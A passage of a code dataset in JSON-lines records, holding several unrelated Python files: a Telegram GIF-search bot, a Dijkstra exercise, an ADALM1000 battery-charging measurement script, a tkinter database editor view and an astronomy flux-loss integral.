int(old.phase), float(old.amzug), int(old.zuege),float(old.sieger),float(old.wert))\n if old.steine[feld]==0:\n neu.steine[feld]=float(old.amzug)\n if(neu.muehlegebaut(feld, nehmen)):\n if manuel:\n print(f'{feld} ist Teil einer Mühle, {nehmen} wird entfernt')\n neu.steine[nehmen]=0\n neu.amzug=float(old.amzug*(-1))\n neu.zuege +=1\n neu.wert = float(neu.bewertung(manuel))\n if neu.zuege==18:\n neu.phase=2\n return neu\n else:\n if manuel:\n print('Unzulässiger Zug!')\n return False\n","repo_name":"aedolfi/muehle","sub_path":"stellung.py","file_name":"stellung.py","file_ext":"py","file_size_in_byte":6882,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43735915481","text":"import asyncio\n\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types import InlineKeyboardButton, InlineKeyboardMarkup, CallbackQuery\nfrom aiogram.dispatcher.filters import Text\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram import types, Dispatcher\nfrom aiogram.utils.callback_data import CallbackData\nfrom aiogram.utils.exceptions import RetryAfter\n\nfrom create_bot import dp, bot\nfrom client.http_client import *\nfrom database import DBase\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom keyboards import inline_keyboard_lang, inline_keyboard_category\n\n\ngifs = dict()\ndbase = DBase()\nstorage = MemoryStorage()\nleng_type = \"\"\nleng_phrase = \"\"\n\ncategories_callback = CallbackData(\"CategorY__\", \"page\", \"category_name\")\n\ncategory_list = get_categories_tenor_req()\n\n\ndef get_pagination_keyboard(page: int = 0) -> InlineKeyboardMarkup:\n keyboard = InlineKeyboardMarkup(row_width=1)\n has_next_page = len(category_list) > page + 1\n\n if page != 0:\n keyboard.add(\n InlineKeyboardButton(\n text=\"👈\",\n callback_data=categories_callback.new(page=page - 1,\n category_name=f'{category_list[page - 1][\"searchterm\"]}')\n )\n )\n\n keyboard.add(\n InlineKeyboardButton(\n text=f'Показать все из \"{str.capitalize(category_list[page][\"searchterm\"])}\"',\n callback_data=f'category__{category_list[page][\"searchterm\"]}\"'\n )\n )\n\n if has_next_page:\n keyboard.add(\n InlineKeyboardButton(\n text=\"👉\",\n callback_data=categories_callback.new(page=page + 1,\n category_name=f'{category_list[page + 1][\"searchterm\"]}')\n )\n )\n\n return keyboard\n\n\n@dp.message_handler(Text(equals=\"Популярные категории\", ignore_case=True), state=None)\nasync def category_index_handler(message: types.Message):\n await bot.send_message(message.from_user.id,\n \"Показать все категории или по одной, но с превью?\",\n reply_markup=InlineKeyboardMarkup(row_width=2).row(\n InlineKeyboardButton(text=\"Все сразу\", callback_data=\"collect_cat__yes\"),\n InlineKeyboardButton(text=\"По одной\", callback_data=\"collect_cat__no\")))\n\n\n@dp.callback_query_handler(Text(startswith=\"collect_cat__\"), state=None)\nasync def show_type_category_callback_hendler(collback: types.CallbackQuery):\n callback_user_id = collback.from_user.id\n res = collback.data.split(\"__\")[1]\n if res == \"yes\":\n for teg in category_list:\n inline_keyboard_category.insert(\n InlineKeyboardButton(text=f'{teg[\"searchterm\"]}', callback_data=f'category__{teg[\"searchterm\"]}'))\n\n await bot.send_message(callback_user_id,\n 'В каждой категории по несколько вариантов популярных ��ифок. Нажмите на любую для просмотра.',\n reply_markup=inline_keyboard_category)\n await collback.answer()\n else:\n if res == \"no\":\n category_one = category_list[0]\n keyboard = get_pagination_keyboard() # Page: 0\n\n await bot.send_animation(\n chat_id=callback_user_id,\n animation=category_one[\"image\"],\n reply_markup=keyboard\n )\n\n\n@dp.callback_query_handler(categories_callback.filter())\nasync def paginate_category_callback_handler(query: CallbackQuery, callback_data: dict):\n page = int(callback_data.get(\"page\"))\n category_one = category_list[page]\n keyboard = get_pagination_keyboard(page=page)\n\n await bot.send_animation(\n chat_id=query.from_user.id,\n animation=category_one[\"image\"],\n reply_markup=keyboard\n )\n\n\n@dp.callback_query_handler(Text(startswith=\"category__\"), state=None)\nasync def show_list_category_colaback_hendler(collback: types.CallbackQuery):\n callback_user_id = collback.from_user.id\n res = collback.data.split(\"__\")[1]\n await collback.answer(f'Выбрана категория {res}')\n gifs_from_tenor_list = get_category_list_tenor_req(res)\n for gif in gifs_from_tenor_list:\n try:\n await bot.send_animation(callback_user_id, gif, reply_markup=InlineKeyboardMarkup(row_width=1).add(\n InlineKeyboardButton(text=\"Сохранить в базу\", callback_data=\"save__\")))\n except RetryAfter as e:\n await asyncio.sleep(e.timeout)\n await collback.answer()\n\n\n\nclass FSMSearch(StatesGroup):\n subj = State()\n limit = State()\n\n\n# Машина состояний для searchAPI________________________________________________________________________________________\n# Запускаем машину состояния FSMAdmin хэндлером\n\n@dp.message_handler(Text(equals=\"Найти по слову\", ignore_case=True))\nasync def choose_lang_handler(message: types.Message):\n await message.answer(\"Выберите язык на котором будете писать запрос\", reply_markup=inline_keyboard_lang)\n\n\n@dp.callback_query_handler(Text(startswith=\"leng__\"), state=None)\nasync def colaback_hendler_lang_start_search(collback: types.CallbackQuery):\n res = collback.data.split(\"__\")[1]\n print(f'Выбран язык - {res}')\n global leng_type\n global leng_phrase\n if res == \"rus_\":\n leng_type = \"ru\"\n leng_phrase = \"русском языке\"\n print(leng_type)\n elif res == \"engl_\":\n leng_type = \"en\"\n leng_phrase = \"английском языке\"\n print(leng_type)\n await FSMSearch.subj.set()\n await collback.answer()\n await bot.send_message(collback.from_user.id, f'Напишите ключевое слово поиска на {leng_phrase}')\n\n\n# Выход из состояния\n@dp.message_handler(state=\"*\", commands='отмена')\n@dp.message_handler(Text(equals=['отмена', 'Отменить поиск'], ignore_case=True), state=\"*\")\nasync def cansel_state_search(maseege: types.Message, state: FSMContext):\n current_state = await state.get_state()\n if current_state is None:\n return\n await state.finish()\n await maseege.reply(\"Ok, отменяем)\")\n await maseege.answer(\"Что будем искать?)\")\n\n\n# Устанавливаем машину состояния в состояние приема фото и запрашиваем у пользователя файл\n@dp.message_handler(state=FSMSearch.subj)\nasync def load_subj_sm_search(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['subj'] = message.text\n await FSMSearch.next()\n await message.answer(\"Сколько найти? Максимальное количество - 1000 gifs. Пишите число, это например 1, 2, 22))\")\n\n\n# Устанавливаем машину состояния в состояние приема названия и запрашиваем у пользователя текст\n@dp.message_handler(state=FSMSearch.limit)\nasync def load_limit_sm_search(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['limit'] = message.text\n await FSMSearch.next()\n await message.answer(\"Okey, я запомнил. Произвожу поиск ...\")\n async with state.proxy() as data:\n list_gifs = search_req(data[\"subj\"], data[\"limit\"], leng_type)\n for gif in list_gifs:\n await bot.send_animation(message.from_user.id, gif, reply_markup=InlineKeyboardMarkup(row_width=1).add(\n InlineKeyboardButton(text=\"Сохранить в базу\", callback_data=\"save__\")))\n await message.answer(\"Сделано, жду команд!\")\n await state.finish()\n\n\n# Машина состояний для randomAPI________________________________________________________________________________________\n\n\nclass FSMRandom(StatesGroup):\n subj = State()\n\n\n@dp.message_handler(Text(equals=\"Случайная по слову\", ignore_case=True), state=None)\nasync def cm_start_random(message: types.Message):\n await FSMRandom.subj.set()\n await message.answer(\"Напишите ключевое слово для поиска на английском языке\")\n\n\n@dp.message_handler(state=\"*\", commands='отмена')\n@dp.message_handler(Text(equals=['отмена', 'Отменить поиск'], ignore_case=True), state=\"*\")\nasync def cansel_state_random(maseege: types.Message, state: FSMContext):\n current_state = await state.get_state()\n if current_state is None:\n return\n await state.finish()\n await maseege.answer(\"Ok, отменяем)\")\n await maseege.answer(\"Что будем искать?)\")\n\n\n@dp.message_handler(state=FSMRandom.subj)\nasync def load_subj_sm_random(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['subj'] = message.text\n await FSMSearch.next()\n await message.answer(\"Okey, я запомнил. Произвожу поиск ...\")\n async with state.proxy() as data:\n await bot.send_animation(message.from_user.id, random_req(data['subj']),\n reply_markup=InlineKeyboardMarkup(row_width=1).add(\n InlineKeyboardButton(text=\"Сохранить в базу\", callback_data=\"save__\")))\n await state.finish()\n await message.answer(\"Сделано, жду команд!\")\n\n\n# Машина состояний для translateAPI________________________________________________\n\nclass FSMTranslate(StatesGroup):\n phrase = State()\n\n\n@dp.message_handler(Text(equals=\"Гифка под фразу\", ignore_case=True), state=None)\nasync def cm_start_translate(message: types.Message):\n await FSMTranslate.phrase.set()\n await message.answer(\"Напишите любую фразу на английском языке\")\n\n\n@dp.message_handler(state=\"*\", commands='отмена')\n@dp.message_handler(Text(equals=['отмена', 'Отменить поиск'], ignore_case=True), state=\"*\")\nasync def cansel_state_translate(maseege: types.Message, state: FSMContext):\n current_state = await state.get_state()\n if current_state is None:\n return\n await state.finish()\n await maseege.reply(\"Ok, отменяем)\")\n await maseege.answer(\"Что будем искать?)\")\n\n\n@dp.message_handler(state=FSMTranslate.phrase)\nasync def load_subj_sm_translate(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['phrase'] = message.text\n await FSMTranslate.next()\n await message.answer(\"Okey, я запомнил. Произвожу поиск ...\")\n async with state.proxy() as data:\n await bot.send_animation(message.from_user.id, translate_req(data['phrase']),\n reply_markup=InlineKeyboardMarkup(row_width=1).add(\n InlineKeyboardButton(text=\"Сохранить в базу\", callback_data=\"save__\")))\n await state.finish()\n await message.answer(\"Сделано, жду команд!\")\n\n\n# trendAPI_________________________________________________________________\n\n@dp.message_handler(Text(equals=\"Популярные гифки\"))\nasync def trand_api(message: types.Message):\n await message.answer(\"Минутку, произвожу поиск...\")\n global gifs\n gifs.clear()\n gifs = trend_req()\n for item in gifs.items():\n await bot.send_animation(message.from_user.id, item[1],\n reply_markup=InlineKeyboardMarkup(row_width=1).add(\n InlineKeyboardButton(text=\"Сохранить в базу\", callback_data=\"save__\")))\n await message.answer(\"Сделано, жду команд!\")\n\n\n\n@dp.callback_query_handler(Text(startswith=\"save_\"))\nasync def colaback_hendler(collback: types.CallbackQuery):\n res = collback.data.split(\"_\")[1]\n # dbase.save_gif(gifs[res])\n # print(gifs[res])\n await collback.answer(\"В разработке...\")\n\n\ndef register_handlers_admin(dp: Dispatcher):\n dp.register_message_handler(category_index_handler, Text(equals=\"Популярные категории\", ignore_case=True),\n state=None)\n dp.register_callback_query_handler(show_type_category_callback_hendler, Text(startswith=\"collect_cat__\"),\n state=None)\n dp.register_callback_query_handler(paginate_category_callback_handler, categories_callback.filter())\n dp.register_callback_query_handler(show_list_category_colaback_hendler, Text(startswith=\"category__\"), state=None)\n\n dp.register_message_handler(choose_lang_handler, Text(equals=\"Найти по слову\", ignore_case=True))\n dp.register_callback_query_handler(colaback_hendler_lang_start_search, Text(startswith=\"leng__\"), state=None)\n dp.register_message_handler(cansel_state_search, state=\"*\", commands='отмена')\n dp.register_message_handler(load_subj_sm_search, state=FSMSearch.subj)\n dp.register_message_handler(load_limit_sm_search, state=FSMSearch.limit)\n\n dp.register_message_handler(cm_start_random, Text(equals=\"Случайная по слову\", ignore_case=True), state=None)\n dp.register_message_handler(cansel_state_random, state=\"*\", commands='отмена')\n dp.register_message_handler(load_subj_sm_random, state=FSMRandom.subj)\n\n dp.register_message_handler(cm_start_translate, Text(equals=\"Гифка под фразу\", ignore_case=True), state=None)\n dp.register_message_handler(cansel_state_translate, state=\"*\", commands='отмена')\n dp.register_message_handler(load_subj_sm_translate, state=FSMTranslate.phrase)\n\n dp.register_message_handler(trand_api, Text(equals=\"Популярные гифки\"))\n","repo_name":"vudu79/Discouts_parser_bot","sub_path":"handlers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":14179,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"6112843870","text":"import heapq\nINF = float('inf')\n\ndef dijkstra(graph):\n costs = [INF] * len(graph)\n q = [[0, 0]]\n costs[0] = 0\n while q:\n cost, cur = heapq.heappop(q)\n for nxt in graph[cur]:\n nxt_cost = cost + 1\n\n if costs[nxt] > nxt_cost:\n costs[nxt] = nxt_cost\n heapq.heappush(q, [nxt_cost, nxt])\n \n return costs\n\ndef solution(n, edge):\n graph = [[] for _ in range(n)]\n for node1, node2 in edge:\n graph[node1-1].append(node2-1)\n graph[node2-1].append(node1-1)\n \n dist = dijkstra(graph)\n return dist.count(max(dist))","repo_name":"eello/solve-algorithm","sub_path":"programmers/LEVEL-3/가장_먼_노드_v1.py","file_name":"가장_먼_노드_v1.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72627398940","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nLaden eines Akkus mit dem M1K mit einem Sinus-modulierten Gleichstrom:\nKanal A ist im High Impedance Modus und misst die Spannung am Akku.\nKanal B ist eine Stromquelle mit sinusförmigen Stromverlauf, mit dem der Akku\nüber einen Vorwiderstand von ca. 10 Ohm aufgeladen wird.\n\nAusgegeben wird jeweils der Mittelwert und die Standardabweichung der Spannung\nvon Kanal A (Akkuspannung U_Bat) und des Stroms von Kanal B (Ladestrom I_Bat).\nBerechnet werden der Widerstand U_Bat/I_Bat sowie der differenzielle Widerstand\nWechselanteil(U_Bat)/Wechselanteil(I_Bat).\nDamit beide Widerstandswerte übereinstimmen, müsste von U_Batt noch die \nLeerlaufspannung abgezogen werden. Diese ist aber nicht bekannt.\n\n16.1.2021, S Mack\n\"\"\"\n\nimport time\nimport threading as th # damit im getrennten Thread Return-Eingabe erkannt wird\nimport numpy as np\nfrom pysmu import Session, Mode\n\n\nSAMP_RATE = 100000\nNUM_SAMPLES = 10000\nAWGB_IVAL_MIN = 100 # 140\nAWGB_IVAL_MAX = 120 # 180\nFREQ = 100\nTIME_STEP = 5 # Messzuyklus in Sekunden\nFILE_NAME = 'bat-charge.txt'\nCURR_OFFSET = 14.7 # M1K current measurement offset\n\nkeep_going = True # Flag um While-Schleife der Messung zu beenden\n\n# wird als 2. Thread ausgeführt um Return-Eingabe zu erkennen\ndef key_capture_thread(): \n global keep_going\n input()\n keep_going = False\n \nmeas_file = open(FILE_NAME,'w')\n\nmeas_file.write('Messreihe Ladevorgang Akku: AC ist Effektivwert\\n')\nmeas_file.write('Frequenz: {} Hz, Sin-Min: {} mA, Sin-Max: {} mA\\n\\n'.format(FREQ,AWGB_IVAL_MIN,AWGB_IVAL_MAX))\nmeas_file.write('t [s]; U_DC [v]; I_DC [mA]; R_DC [Ohm]; U_AC [v]; I_AC [mA]; R_Diff [Ohm]; C [mAh] \\n\\n')\n\n# 2. Thread starten\nth.Thread(target=key_capture_thread, args=(), name='key_capture_thread', daemon=True).start()\nprint('Zum Beenden Return drücken...')\nprint()\n\nsession = Session(ignore_dataflow=True, sample_rate=SAMP_RATE, queue_size=NUM_SAMPLES)\nif session.devices:\n dev = session.devices[0]\n DevID = dev.serial\n print(\"Device ID:\" + str(DevID))\n FWRev = float(dev.fwver)\n HWRev = str(dev.hwver)\n print('Firmware Revision: {}, Hardware Revision: {}'.format(FWRev, HWRev))\n print()\n if FWRev < 2.17:\n print(\"WARNING: Firmware version > 2.16 required!\")\n\n session.flush()\n CHA = dev.channels['A'] # Open CHA\n CHA.mode = Mode.HI_Z_SPLIT # Put CHA in Hi Z split mode\n CHB = dev.channels['B'] # Open CHB\n CHB.mode = Mode.HI_Z_SPLIT # Put CHB in Hi Z split mode \n dev.set_adc_mux(0) # kein ADC-Mux, d.h. Abtasten CA-V/I und CB-V/I\n\n CHA.mode = Mode.HI_Z\n CHB.mode = Mode.SIMV # Put CHA in SIMV mode\n periodval = SAMP_RATE/FREQ\n min_i = AWGB_IVAL_MIN/1000\n max_i = AWGB_IVAL_MAX/1000\n CHB.sine(max_i, min_i, periodval, 0) \n session.start(0)\n\n print(\"Zeit (s) DC/AC: Spannung (V) Strom (mA) Widerstand (Ohm) Ladung (mAh)\")\n print(\"---------------------------------------------------------------------\")\n start_time = time.time()\n charge_val = 0\n adc_signal = dev.read(10000, -1, True) # Dummy Auslesen, sonst fehlerhafte Werte im Array\n time.sleep(0.2)\n \n while keep_going:\n adc_signal = dev.read(NUM_SAMPLES, -1, True) # Samples aller vier Kanaele auslesen \n\n cha_u_vals = [] # Buffer loeschen\n cha_i_vals = []\n chb_u_vals = []\n chb_i_vals = []\n \n index = 0\n num_samples_real = NUM_SAMPLES\n\n if num_samples_real != len(adc_signal): # manchmal gibt ADC weniger Samples zurueck als angefordert\n num_samples_real = len(adc_signal)\n \n while index < num_samples_real:\n cha_u_vals.append(adc_signal[index][0][0])\n cha_i_vals.append(adc_signal[index][0][1])\n chb_u_vals.append(adc_signal[index][1][0])\n chb_i_vals.append(adc_signal[index][1][1])\n index = index + 1\n \n cha_u_vals = np.asarray(cha_u_vals)\n chb_i_vals = np.asarray(chb_i_vals) - CURR_OFFSET/1000 # Offset Korrektur\n \n u_ave = cha_u_vals.mean()\n i_ave = chb_i_vals.mean()\n r_ave = u_ave / i_ave\n u_std = cha_u_vals.std()\n i_std = chb_i_vals.std()\n r_std = u_std / i_std\n charge_val = charge_val + TIME_STEP * i_ave\n meas_time = int(time.time() - start_time)\n print(\"t={:4}: DC: U={:6.3f} V, I={:7.4f} mA, R={:6.3f} Ohm AC: U={:8.6f} V, I={:7.4f} mA, R={:6.4f} Ohm C={:4.1f} mAh\"\\\n .format(meas_time, u_ave, i_ave*1000, r_ave, u_std, i_std*1000, r_std, charge_val))\n meas_file.write(\"{};{:.3f};{:.4f};{:.3f};{:.6f};{:.4f};{:.4f};{:4.1f}\\n\"\\\n .format(meas_time, u_ave, i_ave*1000, r_ave,u_std, i_std*1000, r_std, charge_val))\n time.sleep(TIME_STEP)\n\n print('Programm wurde durch Return-Eingabe beendet.')\n meas_file.close()\n time.sleep(2)\n # damit M1K nach Beenden im sicheren Zustand\n CHA.mode = Mode.HI_Z_SPLIT # Put CHA in Hi Z split mode\n CHB.mode = Mode.HI_Z_SPLIT # Put CHB in Hi Z split mode\n CHA.constant(0.0)\n CHB.constant(0.0)\n if session.continuous:\n session.end()\n session.remove(dev) # damit kein Problem beim erneutem Programmstart. \nelse:\n print('no devices attached')\n","repo_name":"StefanMack/M1K","sub_path":"BattMeas/bat-charge-sine-cur.py","file_name":"bat-charge-sine-cur.py","file_ext":"py","file_size_in_byte":5230,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"732311251","text":"# p2app/views/continents.py\n#\n# ICS 33 Spring 2023\n# Project 2: Learning to Fly\n#\n# This is the portion of the user interface that is displayed when the\n# Edit / Continents menu item is selected.\n#\n# YOU WILL NOT NEED TO MODIFY THIS FILE AT ALL\n\nimport tkinter\nimport tkinter.messagebox\nfrom p2app.events import *\nfrom .event_handling import EventHandler\nfrom .events import *\n\n\n\nclass ContinentsView(tkinter.Frame, EventHandler):\n def __init__(self, parent):\n super().__init__(parent)\n\n search_view = _ContinentsSearchView(self)\n search_view.grid(row = 0, column = 0, sticky = tkinter.NSEW)\n\n self._edit_view = None\n\n self.rowconfigure(0, weight = 0)\n self.rowconfigure(1, weight = 1)\n self.columnconfigure(0, weight = 1)\n\n\n def on_event(self, event):\n if isinstance(event, SaveContinentFailedEvent):\n tkinter.messagebox.showerror('Save Continent Failed', event.reason())\n\n\n def on_event_post(self, event):\n if isinstance(event, DiscardContinentEvent):\n self._switch_edit_view(None)\n elif isinstance(event, NewContinentEvent):\n self._switch_edit_view(_ContinentEditorView(self, True, True, None))\n elif isinstance(event, StartEditingContinentEvent):\n self._switch_edit_view(_ContinentEditorLoadingView(self))\n elif isinstance(event, ContinentLoadedEvent):\n self._switch_edit_view(_ContinentEditorView(self, False, True, event.continent()))\n elif isinstance(event, ContinentSavedEvent):\n self._switch_edit_view(_ContinentEditorView(self, False, False, event.continent()))\n\n\n def _switch_edit_view(self, edit_view):\n if self._edit_view:\n self._edit_view.destroy()\n self._edit_view = None\n\n if edit_view:\n self._edit_view = edit_view\n self._edit_view.grid(row = 1, column = 0, padx = 5, pady = 5, sticky = tkinter.NSEW)\n\n\nclass _ContinentsSearchView(tkinter.LabelFrame, EventHandler):\n def __init__(self, parent):\n super().__init__(parent, text = 'Continent Search')\n\n code_label = tkinter.Label(self, text = 'Continent Code: ')\n code_label.grid(row = 0, column = 0, padx = 5, pady = 5, sticky = tkinter.E)\n\n self._search_code = tkinter.StringVar()\n self._search_code.trace_add('write', self._on_search_changed)\n\n code_entry = tkinter.Entry(self, textvariable = self._search_code, width = 10)\n code_entry.grid(row = 0, column = 1, sticky = tkinter.W, padx = 5, pady = 5)\n\n name_label = tkinter.Label(self, text = 'Name: ')\n name_label.grid(row = 1, column = 0, sticky = tkinter.E, padx = 5, pady = 5)\n\n self._search_name = tkinter.StringVar()\n self._search_name.trace_add('write', self._on_search_changed)\n\n name_entry = tkinter.Entry(self, textvariable = self._search_name, width = 30)\n name_entry.grid(row = 1, column = 1, sticky = tkinter.EW, padx = 5, pady = 5)\n\n self._search_button = tkinter.Button(\n self, text = 'Search', state = tkinter.DISABLED,\n command = self._on_search_button_clicked)\n\n self._search_button.grid(row = 2, column = 1, sticky = tkinter.E, padx = 5, pady = 5)\n\n empty_area = tkinter.Label(self, text = '')\n empty_area.grid(row = 3, column = 1, sticky = tkinter.NSEW, padx = 5, pady = 5)\n\n self._search_list = tkinter.Listbox(\n self, height = 4,\n activestyle = tkinter.NONE, selectmode = tkinter.SINGLE)\n\n self._search_list.bind('<>', self._on_search_selection_changed)\n self._search_list.grid(\n row = 0, column = 2, rowspan = 4, columnspan = 1, sticky = tkinter.NSEW,\n padx = 5, pady = 5)\n\n self._search_continent_ids = []\n\n button_frame = tkinter.Frame(self)\n button_frame.grid(row = 4, column = 2, sticky = tkinter.E, padx = 5, pady = 5)\n\n self._new_button = tkinter.Button(\n button_frame, text = 'New Continent',\n command = self._on_new_continent)\n\n self._new_button.grid(row = 0, column = 0, padx = 5, pady = 5)\n\n self._edit_button = tkinter.Button(\n button_frame, text = 'Edit Continent', state = tkinter.DISABLED,\n command = self._on_edit_continent)\n\n self._edit_button.grid(row = 0, column = 1, padx = 5, pady = 5)\n\n self.rowconfigure(0, weight = 0)\n self.rowconfigure(1, weight = 0)\n self.rowconfigure(2, weight = 0)\n self.rowconfigure(3, weight = 1)\n self.rowconfigure(4, weight = 0)\n self.columnconfigure(0, weight = 0)\n self.columnconfigure(1, weight = 1)\n self.columnconfigure(2, weight = 2)\n\n\n def _on_search_button_clicked(self):\n self.initiate_event(ClearContinentsSearchListEvent())\n self.initiate_event(StartContinentSearchEvent(self._get_search_code(), self._get_search_name()))\n\n\n def _get_search_code(self):\n code = self._search_code.get().strip()\n return code if len(code) > 0 else None\n\n\n def _get_search_name(self):\n name = self._search_name.get().strip()\n return name if len(name) > 0 else None\n\n\n def _get_selected_search_continent_id(self):\n selection, *_ = self._search_list.curselection()\n return self._search_continent_ids[selection]\n\n\n def _on_search_changed(self, *args):\n if len(self._search_code.get().strip()) > 0 or len(self._search_name.get().strip()) > 0:\n new_state = tkinter.NORMAL\n else:\n new_state = tkinter.DISABLED\n\n self._search_button['state'] = new_state\n return True\n\n\n def _on_search_selection_changed(self, event):\n if event.widget.curselection():\n new_state = tkinter.NORMAL\n else:\n new_state = tkinter.DISABLED\n\n self._edit_button['state'] = new_state\n\n\n def _on_new_continent(self):\n self.initiate_event(DiscardContinentEvent())\n self.initiate_event(NewContinentEvent())\n\n\n def _on_edit_continent(self):\n self.initiate_event(DiscardContinentEvent())\n self.initiate_event(StartEditingContinentEvent())\n self.initiate_event(LoadContinentEvent(self._get_selected_search_continent_id()))\n\n\n def on_event(self, event):\n if isinstance(event, ClearContinentsSearchListEvent):\n self._search_list.delete(0, tkinter.END)\n self._search_continent_ids = []\n self._edit_button['state'] = tkinter.DISABLED\n elif isinstance(event, ContinentSearchResultEvent):\n display_name = f'{event.continent().continent_code} - {event.continent().name}'\n self._search_list.insert(tkinter.END, display_name)\n self._search_continent_ids.append(event.continent().continent_id)\n\n\n\nclass _ContinentEditorLoadingView(tkinter.LabelFrame, EventHandler):\n def __init__(self, parent):\n super().__init__(parent)\n\n loading_label = tkinter.Label(self, text = 'Loading...')\n loading_label.grid(row = 0, column = 0, padx = 5, pady = 5, sticky = tkinter.W)\n\n\n\nclass _ContinentEditorView(tkinter.LabelFrame, EventHandler):\n def __init__(self, parent, is_new, is_editable, continent):\n if is_new:\n frame_text = 'New Continent'\n elif is_editable:\n frame_text = 'Edit Continent'\n else:\n frame_text = 'Continent Saved'\n\n super().__init__(parent, text = frame_text)\n\n self._is_new = is_new\n self._continent_id = continent.continent_id if continent else None\n code = continent.continent_code if continent and continent.continent_code else ''\n name = continent.name if continent and continent.name else ''\n\n self._continent_code = tkinter.StringVar()\n self._continent_code.set(code)\n\n self._continent_name = tkinter.StringVar()\n self._continent_name.set(name)\n\n continent_id_label = tkinter.Label(self, text = 'Continent ID: ')\n continent_id_label.grid(row = 0, column = 0, padx = 5, pady = 5, sticky = tkinter.E)\n\n continent_id_value_label_text = f'{self._continent_id if self._continent_id else \"(New)\"}'\n continent_id_value_label = tkinter.Label(self, text = continent_id_value_label_text)\n continent_id_value_label.grid(row = 0, column = 1, padx = 5, pady = 5, sticky = tkinter.W)\n\n code_label = tkinter.Label(self, text = 'Continent Code: ')\n code_label.grid(row = 1, column = 0, padx = 5, pady = 5, sticky = tkinter.E)\n\n if is_editable:\n code_entry = tkinter.Entry(self, textvariable = self._continent_code, width = 10)\n else:\n code_entry = tkinter.Label(self, textvariable = self._continent_code)\n\n code_entry.grid(row = 1, column = 1, padx = 5, pady = 5, sticky = tkinter.W)\n\n name_label = tkinter.Label(self, text = 'Name: ')\n name_label.grid(row = 2, column = 0, padx = 5, pady = 5, sticky = tkinter.E)\n\n if is_editable:\n name_entry = tkinter.Entry(self, textvariable = self._continent_name, width = 30)\n else:\n name_entry = tkinter.Label(self, textvariable = self._continent_name)\n\n name_entry.grid(row = 2, column = 1, padx = 5, pady = 5, sticky = tkinter.W)\n\n button_frame = tkinter.Frame(self)\n button_frame.grid(row = 4, column = 1, padx = 5, pady = 5, sticky = tkinter.SE)\n\n if is_editable:\n save_button = tkinter.Button(button_frame, text = 'Save', command = self._on_save)\n save_button.grid(row = 0, column = 0, padx = 5, pady = 5)\n\n discard_button = tkinter.Button(button_frame, text = 'Discard', command = self._on_discard)\n discard_button.grid(row = 0, column = 1, padx = 5, pady = 5)\n\n self.rowconfigure(0, weight = 0)\n self.rowconfigure(1, weight = 0)\n self.rowconfigure(2, weight = 0)\n self.rowconfigure(3, weight = 1)\n self.rowconfigure(4, weight = 0)\n self.columnconfigure(0, weight = 0)\n self.columnconfigure(1, weight = 1)\n\n\n def _on_save(self):\n if self._is_new:\n self.initiate_event(SaveNewContinentEvent(self._make_continent()))\n else:\n self.initiate_event(SaveContinentEvent(self._make_continent()))\n\n\n def _on_discard(self):\n self.initiate_event(DiscardContinentEvent())\n\n\n def _make_continent(self):\n return Continent(self._continent_id, self._continent_code.get(), self._continent_name.get())\n","repo_name":"jwmason/AirportDatabaseAccessTool","sub_path":"p2app/views/continents.py","file_name":"continents.py","file_ext":"py","file_size_in_byte":10501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"4010444781","text":"from scipy.integrate import quad\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef integrand_theta(theta, rho,R,sigma):\t# Integration with respect to theta\n return np.exp(2*rho*R*np.cos(theta) / 2*sigma**2)\n\ndef integrand_R(R,rho,sigma):\t\t\t# Integration with respect to R \n return R*np.exp(-R**2 / 2*sigma**2)*quad(integrand_theta, 0, 2*np.pi, args=(rho,R,sigma))[0]*np.exp(-rho**2 / 2*sigma**2)\n\ndef main():\n\n\tFWHM\t\t= 1.7\t# FWHM in Cross dispersion direction p.56 COS manual\n\tR \t= 1.25\t# Aperture size. R = Diameter of 2.5\"/2 = 1.25\"\n\t\n\tsigma \t= FWHM/ 2*np.sqrt(2*np.log(2))\t# Convert from FWHM --> sigma\n\trho \t= np.arange(0,1.5,0.1)\t\t\t# [arcsec]\n\n\tflux\t= []\n\tshift\t= []\n\n\tfor i in range(len(rho)):\n\t\tflux.append(quad(integrand_R, 0, R, args=(rho[i],sigma))[0])\n\t\tshift.append(rho[i])\n\t\n\tflux = np.array(flux)\n\tshift = np.array(shift)\n\t\n\tplt.plot(shift,flux/flux[0],'-k')\n\tplt.ylabel('Flux loss')\n\tplt.xlabel('Arsecond shift away from central position')\n\tplt.show()\n\nif __name__ == '__main__':\n main()\n","repo_name":"lecaveli/betapic","sub_path":"theoretical_flux_loss.py","file_name":"theoretical_flux_loss.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
